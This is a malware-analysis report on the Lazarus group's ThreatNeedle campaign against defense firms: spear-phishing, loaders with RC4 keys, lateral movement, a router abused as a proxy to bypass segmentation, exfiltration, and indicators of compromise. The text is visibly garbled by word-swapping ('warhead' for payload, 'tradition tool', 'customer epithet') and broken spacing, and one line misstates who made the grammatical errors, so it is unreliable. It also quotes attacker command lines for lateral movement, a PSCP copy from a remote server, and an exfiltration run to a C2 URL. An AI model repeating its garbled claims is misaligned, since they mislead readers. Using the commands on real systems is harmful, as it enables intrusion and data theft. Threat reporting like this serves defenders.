We named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT group targeting various industries. The group has changed target depending on the primary objective. Google TAG has recently published a post about awareness-raising campaigns by Lazarus targeting security researchers. After taking a closer look, we recognized the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have discovered Lazarus attack various industries utilizing this malware cluster before. In mid-2 020, we realized that Lazarus was launching strikes on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of Manuscrypt( a.k.a. NukeSped ). While analyse project activities, we were able to observe the complete life cycle of an attack, uncovering more technological details and links to the group’s other campaigns.
The group made use of COVID-1 9 topics in its spear-phishing emails, embellishing them with personal information gathered applying publicly available sources. After gaining an initial foothold, the attackers assembled credentials and moved laterally, striving crucial assets in the victim environment. We find how they overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, enable them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in more than a dozen countries have been affected.
During this investigation we had a chance to look into the command-and-control infrastructure. The attackers configured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns.
In this attack, spear phishing was used as the initial infection vector. Before launching the attack, different groups studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company.
Email addresses in those departments received phishing emails that either had a malicious Word document attached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s hottest topic- COVID-1 9 infections. The phishing emails were carefully crafted and written on behalf of a medical middle that is part of the organization under attack.
Phishing email with links to malicious documents
The attackers registered accounts with a public email service, attaining sure the sender’s email addresses appeared similar to the medical center’s real email address. The signature shown in the phishing emails included the actual personal data of the deputy head doctor of the attacked organization’s medical center. The attackers were able to find this information on the medical center’s public website.
The document contains information on the population health assessment program and is not directly related to the subject of the phishing email( COVID-1 9 ), proposing the attackers is no longer able altogether understand the meaning of the contents they used.
Contents of malicious document
The content of the lure record was facsimile from an online post by a health clinic.
Our investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being incapacitated in the Microsoft Office installation of specific targeted systems. In order to persuade the target to allow the malicious macro, the attacker sent another email showing how to enable macros in Microsoft Office.
Email with instructions on enabling macros #1
After sending the above email with interpretations, the attackers realized that the target was using a different version of Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently sent another email indicating the remedy procedure in a screenshot with a Russian language pack.
Email with educations on enabling macros #2
The content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any grammatical missteps. However, in subsequent emails the attackers built numerous errors, indicating we were not able to native Russian speakers and were applying translation tools.
Email containing several grammatical mistakes
This group also utilized different types of spear-phishing attack. One of the compromised hosts received several spear-phishing documents on May 19, 2020. The malicious file that was delivered, named Boeing_AERO_GS.docx, fetches a template from a remote server.
However , no payload created by this malicious document could be discovered. We speculate that the infection from this malicious document failed for a reason unknown to us. A few weeks later, the same host opened a different malicious record. The menace actor wiped these files from disk after the initial infection meaning they could not be obtained.
Nonetheless, a related malicious record with this malware was retrieved based on our telemetry. It generates a payload and shortcut file and then continues executing the payload by using the following command line parameters.
Payload path:% APPDATA %\ Microsoft \ Windows \ lconcaches.db Shortcut path:% APPDATA %\ Microsoft \ Windows \ Start Menu \ Programs \ Startup \ OneDrives.lnk Command Line; please note that the string at the end is hard-coded, but different for each sample: exe[ dllpath ], Dispatch n2UmQ9McxUds2b29
The content of the decoy record illustrates the job description of a generator/ power industry engineer.
Upon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage deployment procedure. The malware used in this campaign belongs to a known malware cluster we named ThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt( a.k.a. NukeSped ), a family belonging to the Lazarus group. We previously observed the Lazarus group use this cluster when assaulting cryptocurrency the enterprises and a mobile game corporation. Although the malware involved and the entire infection process is known and has not changed dramatically compared to previous findings, the Lazarus group continued utilizing ThreatNeedle malware aggressively in this campaign.
The payload created by the initial spear-phishing document loadings the next phase as a backdoor running in-memory- the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor use it to carry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the actor utilizes ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next stage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle loader-type malware exists in several alterations and serves the primary purpose of loading the last stage of the ThreatNeedle malware in-memory.
Upon launch, the malware decrypts an embedded string employ RC4( key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4) and compares it to “7486513879852”. If the user executes this malware without a command line parameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.
Further into the infection process, the malware prefers a service name haphazardly from netsvc in order to use it for the payload initiation track. The malware then generates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service epithet that is chosen. We’ve discovered that the malware operator checks this file to see whether the remote host was infected and, if so, when the infection happened.
It then decrypts the embedded warhead utilizing the RC4 algorithm, saves it to an. xml expansion with a randomly generated five-character file name in the current directory and then transcripts it to the system folder with a. sys extension.
This final payload is the ThreatNeedle loader running in memory. At this point the loader use a different RC4 key( 3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20 ), and the dropped malware is registered as a Windows service and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4 😛 TAGEND
Loading the warhead from the registry. Loading the payload from itself after decrypting RC4 and decompression. Loading the payload from itself after decrypting AES and decompression. Loading the payload from itself after decompression. Loading the payload from itself after one-byte XORing.
Most loader-style malware characters check the command line parameter and only carried out with the malicious routine if an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example we’ve seen is similar to the ThreatNeedle installer- the malware decrypts an embedded string utilize RC4, and compares it with the parameter “Sx6BrUk4v4rqBFBV” upon launching. If it matches, the malware begins decrypting its embedded payload using the same RC4 key. The decrypted payload is an archive file which is subsequently decompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.
The other variant of the loader is preparing the next stage payload from the victim’s registry. As we can see from the installer malware description, we suspect that the registry key was created by the installer component. Retrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into memory and the export function is invoked.
From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally utilizing Windows commands. Lazarus overcame network segmentation, exfiltrating data from a altogether isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under “Overcoming network segmentation”.
Judging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the primary purpose of this attack is to steal intellectual property. Lastly, the stolen data get exfiltrated applying a tradition tool that will be described in the “Exfiltration” section. Below is a rough timeline of the compromise we analyse 😛 TAGEND
Timeline of infected hosts
During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One period after the initial infection, the malware operator placed the tool onto this host and executed it applying the following command 😛 TAGEND
[ Responder file path] -i[ IP address] -rPv
Several days later, the attacker started to move laterally is obtained from this host. Therefore, we assess that the attacker succeeded in acquiring login credentials from this host and started using them for further malicious activity.
After acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical lateral movement techniques were employed, use Windows commands. First, a network connection with a remote host was established employing the command” net use “.
net use \\[ IP address ]\ IPC$ “[ password ]”/ u :”[ customer name ]”>$ temp \~ tmp5 936 t.tmp 2 >& 1 ”
exe/ node:[ IP address]/ user :”[ consumer epithet ]”/ password :”[ password ]” PROCESS CALL CREATE” cmd.exe/ c$ appdata \ Adobe \ adobe.bat” exe/ node:[ IP address]/ consumer :”[ consumer epithet ]”/ password :”[ password ]” PROCESS CALL CREATE” cmd/ c sc queryex helpsvc>$ temp \ tmp0 01. dat”
Overcoming network segmentation
In the course of this research, we recognized another highly interesting technique used by the attackers for lateral motion and exfiltration of pilfer data. The enterprise network under assault was divided into two segments: corporate( a network on which computers had internet access) and curtailed( a network on which computers hosted sensitive data and has no such internet access ). According to corporate policies , no transfer of information was permitted between these two segments. In other words, the two segments were meant to be completely separated.
Initially, the attackers were able to get access to systems with internet access and expended a long time distributing malware between machines in the network’s corporate segment. Among the compromised machines were those used by the administrators of the enterprise’s IT infrastructure.
It is worth noting that the administrators could connect both to the corporate and the restricted network segments to maintain systems and provide users with technical support in both zones. As a outcome, by gaining control of administrator workstations the attackers were able to access the restricted network segment.
The situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the administrators to connect to systems in both segments. The router was a virtual machine operating CentOS to route traffic between several network interfaces based on predefined rules.
Connection layout between victim’s network segments
According to the evidence accumulated, the attackers scanned the router’s ports and saw a Webmin interface. Next, the attackers logged in to the web interface utilize a privileged root account. It’s unknown how the attackers were able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the infected system’s browser password managers.
Log directory Webmin web interface logins
By gaining access to the configuration panel the attackers configured the Apache web server and started applying the router as a proxy server between the organization’s corporate and curtailed segments.
List of services used on the router
Several periods after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP( the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the curtailed segment of the enterprise network, use the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router.
New connection layout after attacker’s intrusion
In the course of the investigation we identified malware samples with the hardcoded URL of the router used as a proxy server.
Hardcoded proxy address in the malware
Since the attackers regularly deleted log files from the router, simply a handful of commands entered to the command line via SSH could be recovered. An analysis of these commands shows that the attackers tried to reconfigure traffic routing utilizing the itinerary command.
The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of specific activities from the router, use the logrotate utility to set up automatic omission of log files.
We observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea from several compromised server hosts. They employed a tradition tunneling tool to achieve this. The tool receives four parameters: patron IP address, patron port, server IP address and server port. The tool offers basic functionality, forwarding patron traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic utilize trivial binary encryption.
Using the covert channel, the adversary copied data from the remote server over to the host employing the PuTTy PSCP tool 😛 TAGEND
% APPDATA %\ PBL \ unpack.tmp -pw[ password] root @[ IP address ]:/ tmp/ cab0 215 % APPDATA %\ PBL \ cab0 215. tmp
After copying data from the server, the actor utilized the tradition tool to exfiltrate stolen data to the remote server. This malware looks like a legitimate VNC client and runs like one if it’s executed without any command line parameters.
Execution of malware without parameters
However, if this application is executed with specific command line parameters, it runs an alternate, malicious part. According to our telemetry, the actor executed this application with six parameters 😛 TAGEND
% APPDATA %\ Comms \ Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA hxxps :// www.gonnelli [.] it/ uploads/ catalogo/ thumbs/ thumb [.] asp% APPDATA %\ Comms \ cab5 9. tmp FL0509 15000
Also, if the number of command line parameters be higher than six, the malware jump-starts into a malicious routine. The malware also checks the length of the second argument- if it’s less than 29 characters, it terminates the execution. When the parameter checking procedure has passed successfully, the malware starts to decrypt its next payload.
The embedded payload gets decrypted via XOR, where each byte from the end of the warhead gets applied to the preceding byte. Next, the XORed blob receives the second command line argument that’s ( in such cases S0RMM-50QQE-F65DN-DCPYN-5QEQA ). The malware can accept more command line contentions, and depending on its number it runs differently. For instance, it can also receive proxy server addresses with the “-p” option.
When the decrypted in-memory payload is executed, it compares the header of the configuration data passed with the string “0x8406” in order to confirm its validity. The warhead opens a dedicated file( in this instance% APPDATA %\ Comms \ cab5 9. tmp) and starts exfiltrating it to the remote server. When the malware uploads data to the C2 server, it employs HTTP POST requests with two parameters named’ fr’ and’ fp ‘:
Contents of fp parameter
We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed merely to the Lazarus group. During this investigation, we were able to find connections to several the groups of the Lazarus group.
Connections between Lazarus campaigns
Connection with DeathNote cluster
During this investigation we recognized several connections with the DeathNote( a.k.a. Operation Dream Job) cluster of the Lazarus group. First of all, among the hosts infected by the ThreatNeedle malware, we discovered one that was also infected with the DeathNote malware, and both threats use the same C2 server URLs.
In addition, while analyzing the C2 server used in this attack, we determined a custom web shell script that was also detected on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized VNC Uploader was found on the DeathNote C2 server.
Connection with Operation AppleJeus
We also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling tool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same tool was utilized in operation AppleJeus as well.
Same tunneling tool
Connection with Bookcode cluster
In our previous blog about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and recently the Korea Internet and Security Agency( KISA) likewise published a report about the operation. In the report, they mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads. While investigating this incident, we also saw LPEClient from the host infected with ThreatNeedle. So, we assess that the ThreatNeedle cluster is connected to the Bookcode operation.
In recent years, the Lazarus group has focused on attacking international financial institutions various regions of the world. However, starting in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency business, it is currently being actively used in cyberespionage attacks.
This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication degree and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns applying different strategies. They shared tools and infrastructure among these campaigns to accomplish their goals.
Appendix I- Indicators of Compromise
e7aa 0237 fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx
b1 91 cc4d73a247afe0a62a8c38dc9137 %APPDATA%\Microsoft\DRM\logon.bin 9e440e231ef2c62c78147169a26a1bd3 C:\ProgramData\ntnser.bin b7cc 295767 c1d8c6c68b1bb6c4b4214f C:\ProgramData\ntnser.bin 0f967343e50500494cf3481ce4de698c C:\ProgramData\Microsoft\MSDN\msdn.bin 09aa1427f26e7dd48955f09a9c604564 %APPDATA\Microsoft\info.dat 07b22533d08f32d48485a521dbc1974d C:\ProgramData\adobe\load.dat 1c5e4d60a1041cf2903817a31c1fa212 C:\ProgramData\Adobe\adobe.tmp 4cebc83229a40c25434c51ee3d6be13e C:\ProgramData\Adobe\up.tmp 23b04b18c75aa7d286fea5d28d41a830 %APPDATA%\Microsoft\DRM\logon.dat 319ace20f6ffd39b7fff1444f73c9f5d %APPDATA%\Microsoft\DRM\logon.bin 45c0a6e13cad26c69eff59fded88ef36 %APPDATA%\Microsoft\DRM\logon.dat 486f25db5ca980ef4a7f6dfbf9e2a1ad C:\ProgramData\ntusers.dat 1333967486d3ab50d768fb745dae9af5 C:\PerfLogs\log.bin 07b22533d08f32d48485a521dbc1974d C:\ProgramData\Adobe\load.dat c8 6d0a2fa9c4ef59aa09e2435b4ab70c %TEMP%\ETS4659.tmp 69d71f06fbfe177fb1a5f57b9c3ae587 %APPDATA%\Microsoft\Windows\shsvcs.db 7bad67dcaf269f9ee18869e5ef6b2dc1
36ab0902797bd18acd6880040369731c %SYSTEMROOT%\LogonHours.sys db3 5391857 bcf7b 0fa17dbbed97ad269 %ALLUSERSPROFILE%\Adobe\update.tmp be4c 927 f636d2ae88a1e0786551bf3c4 %ALLUSERSPROFILE%\Adobe\unpack.tmp 728948c66582858f6a3d3136c7fbe84a %APPDATA%\Microsoft\IBM.DAT 06af39b9954dfe9ac5e4ec397a3003fb
1a17609b7df20dcb3bd1b71b7cb3c674 %ALLUSERSPROFILE%\ntuser.bin 459be1d21a026d5ac3580888c8239b07 %ALLUSERSPROFILE%\ntuser.bin 87fb7be83eff9bea0d6cc95d68865564 %SYSTEMROOT%\SysWOW64\wmdmpmsp.sys 062a40e74f8033138d19aa94f0d0ed6e %APPDATA%\microsoft\OutIook.db 9b17f0db7aeff5d479eaee8056b9ac09 %TEMP%\ETS4658.tmp,% APPDATA %\ Temp \ BTM0 345. tmp
Trojanized VNC Uploader
File path %SYSTEMROOT%\system32\bcdbootinfo.tlp% SYSTEMROOT %\ system3 2 \ Nwsapagent.sys %SYSTEMROOT%\system32\SRService.sys% SYSTEMROOT %\ system3 2 \ NWCWorkstation.sys %SYSTEMROOT%\system32\WmdmPmSp.sys% SYSTEMROOT %\ system3 2 \ PCAudit.sys %SYSTEMROOT%\system32\helpsvc.sys
Domains and IPs hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php hxxp :// www.au-pair [.] org/ admin/ Newspaper [.] asp hxxp://www.au-pair[.]org/admin/login[.]asp hxxp :// www.colasprint [.] com/ _vti_log/ upload [.] asp hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp hxxp :// www.kwwa [.] org/ popup/ 160307/ popup_1 60308 [.] asp hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp hxxp :// www.sanatoliacare [.] com/ include/ indicator [.] asp hxxps://americanhotboats[.]com/forums/core/cache/index[.]php hxxps :// docentfx [.] com/ wp-admin/ includes/ upload [.] php hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php hxxps :// polyboatowners [.] com/ 2010/ images/ BOTM/ upload [.] php hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php hxxps :// shinwonbook.co [.] kr/ basket/ pay/ open [.] asp hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp hxxps :// theforceawakenstoys [.] com/ vBulletin/ core/ cache/ upload [.] php hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp hxxps :// www.curiofirenze [.] com/ include/ inc-site [.] asp hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php hxxps :// www.digitaldowns [.] us/ artman/ exec/ upload [.] php hxxps://www.dronerc[.]it/forum/uploads/index[.]php hxxps :// www.dronerc [.] it/ shop_testbr/ Adapter/ Adapter_Config [.] php hxxps://www.edujikim[.]com/intro/blue/view[.]asp hxxps :// www.edujikim [.] com/ pay/ sample/ INIstart [.] asp hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp hxxps :// www.fabioluciani [.] com/ ae/ include/ constant [.] asp hxxps://www.fabioluciani[.]com/es/include/include[.]asp hxxp :// www.juvillage.co [.] kr/ img/ upload [.] asp hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp hxxps :// www.lyzeum [.] com/ images/ board/ upload [.] asp hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php hxxps :// www.polyboatowners [.] com/ css/ indicator [.] php hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp hxxps :// www.raiestatesandbuilders [.] com/ admin/ installer/ installer/ index [.] php hxxp://156.245.16[.]55/admin/admin[.]asp hxxp :// fredrikarnell [.] com/ marocko2 014/ index [.] php hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp
Second stage C2 address hxxps://www.waterdoblog[.]com/uploads/index[.]asp hxxp :// www.kbcwainwrightchallenge.org [.] uk/ connects/ dbconn [.] asp
C2 URLs to exfiltrate files used by Trojanized VNC Uploader hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php hxxps :// newidealupvc [.] com: 443/ img/ prettyPhoto/ jquery.max [.] php hxxps://mdim.in[.]ua:443/core/cache/index[.]php hxxps :// forum.snowreport [.] gr: 443/ cache/ template/ upload [.] php hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp hxxps :// www.dellarocca [.] cyberspace/ it/ content/ img/ img [.] asp hxxps://www.astedams[.]it/photos/image/image[.]asp hxxps :// www.geeks-board [.] com/ blog/ wp-content/ uploads/ 2017/ cache [.] php hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp
Appendix II- MITRE ATT& CK Mapping
Tactic Technique Technique Name
Initial Access T1566.002 Phishing: Spearphishing Link
Persistence T1543.003 T1547. 001
T1140 T1070.002 T1070. 003 T1070.004 T1036. 003 T1036.004 T1112
Deobfuscate/ Decode Files or Information Clear Linux or Mac System Logs Clear Command History File Deletion Masquerading: Rename System Utilities Masquerading: Masquerade Task or Service Modify Registry
Credential Access T1557.001 LLMNR/ NBT-NS Poisoning and SMB Relay
T1135 T1057 T1016 T1033 T1049 T1082 T1083 T1007 Network Share Discovery Process Discovery System Network Configuration Discovery System Owner/ User Discovery System Network Connections Discovery System Information Discovery File and Directory Discovery System Service Discovery
Lateral Movement T1021.002 SMB/ Windows Admin Shares
Collection T1560.001 Archive Collected Data: Archive via Utility
Command and Control
T1071. 001 T1132.002 T1104 T1572 T1090. 001
Application Layer Protocol: Web Protocol Non-Standard Encoding Multi-Stage Channels Protocol Tunneling Internal Proxy
Exfiltration T1041 Exfiltration Over C2 Channel